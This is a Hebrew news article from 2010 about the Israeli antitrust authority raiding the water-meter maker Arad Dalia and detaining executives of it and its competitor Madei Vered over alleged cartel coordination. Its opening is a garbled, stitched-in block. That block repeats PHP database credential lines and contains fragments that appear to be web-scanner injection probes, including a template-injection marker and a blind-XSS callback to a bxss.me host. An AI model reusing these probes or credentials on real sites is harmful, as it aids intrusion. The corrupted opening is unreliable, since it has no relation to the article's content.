$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> בית המשפט הורה על הארכת מעצרם של בכירים בשוק מדי המים בישראל
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

נעצרו בכירים בשוק מדי המים בישראל

תאריך: 29/08/2010 15:28   מחבר: מערכת האתר

חברת ארד דליה - מונופול

חברת ארד דליה היא מונופול בתחום מדי המים; היא נחשבת לחברה המובילה בארץ בפיתוח ויצור מכשירי מדידת מים, לבתי מגורים לתעשייה ולחקלאות. רשות ההגבלים הכריזה על החברה כבעלת מונופולין ובתור שכזו חלים עליה הוראות חוק קפדניות וברורות שנועדו למנוע מחברה מונופוליסטית לנצל לרעה את מעמדה כגורמת נזק לציבור הצרכנים ולפגיעה בתחרות החופשית וההוגנת.

כאשר הממונה מכריז על חברה כבעלת מונופולין הוא קובע לה סט של הוראות ודרישות שכל חריגה מהן תחשב כביצוע עבירה לכאורה על החוק. ההוראות קשורות לעיקר הסוגיות הבאות: קביעת מחיר קניה או מכירה לא הוגנים של נכס ומוצר, צמצום או הגדלה של המוצר כדי להשפיע על מחירו בשוק, קביעת תנאי התקשרות עם ספקים העשויים להעניק להם יתרון תחרותי על פני אחרים באותו תחום, התניות פסולות וכובלות בהסכמים מסחריים בין בעל המונופולין ללקוחותיו ועוד.

חקירה ומעצר

בתאריך 26.10.09 פשטו חוקרי הרשות להגבלים עסקיים  על משרדי חברת ארד דליה, יצרנית מכשירים למדידת מים , תפסו מסמכים, עיכבו בכירים לחקירה ואף ביקשו מבית המשפט להאריך את מעצרם. ככל הידוע, החקירה נפתחה בגין עשיית הסדרים כובלים עם המתחרה העיקרית מדי ורד בע"מ ותיאומים במכרזים בהן השתתפו החברות.

בית המשפט נעתר לבקשת הרשות והאריך את מעצרם של החשודים ב 24 ועד 48 שעות.  בין העצורים: ניצן כהן, מנכ"ל חברת ארד בע"מ, אבי בן דור מנכ"ל חברת ארם גלעד האוזמן, מנהל תיקי לקוחות אזורי בחברת ארד ואת גבריאל אלטמן מנהל בחברת מדי ורד בע"מ.

בהחלטתו קבע בית המשפט בין השאר: כי  אין המדובר בחשד נקודתי לתיאום נקודתי אלא בחשד המקיף עשרות רבות של מקרים  . בפני בית המשפט הצטיירה תמונה לפיה שוק שלם האמור להתנהל תוך תחרות חופשית והוגנת פועל תוך כדי תיאום ותניות של בעל מונופולין אל מול לקוחותיו.

לפי הדיווח ב"גלובס". ארד, שנוסדה בשנת 1941, היא אחת החברות הוותיקות בישראל. השליטה בה משותפת לקיבוצים דליה ורמות מנשה. את המוצרים שלה מוכרת ארד בלמעלה מ-60 מדינות, באמצעות שתי חברות בנות. החברה הבת הראשונה פועלת בארצות הברית, ונמצאת בשליטתה המלאה; והחברה הבת השנייה נמצאת בסין, שם פועלת ארד בשיתוף פעולה עם חברה מקומית.

החברה מתקינה בעיקר מדדי מים מכניים, אולם בשנתיים האחרונות החלה להתקין מדים אלחוטיים (AMR), שהינם מערכות ממחושבות לקריאה מרחוק של מערכות מים. כך נחסך הצורך בפקח שיעבור וירשום את המדידה, ונתוני המונה נשלחים אל מרכז שליטה ובקרה.

המתחרה העיקרי של ארד היא חברת מדי ורד בע"מ. חברה זו מייבאת חלקים של מדי מים מחברות בחו"ל, ומרכיבה ומשווקת אותם בשוק המקומי.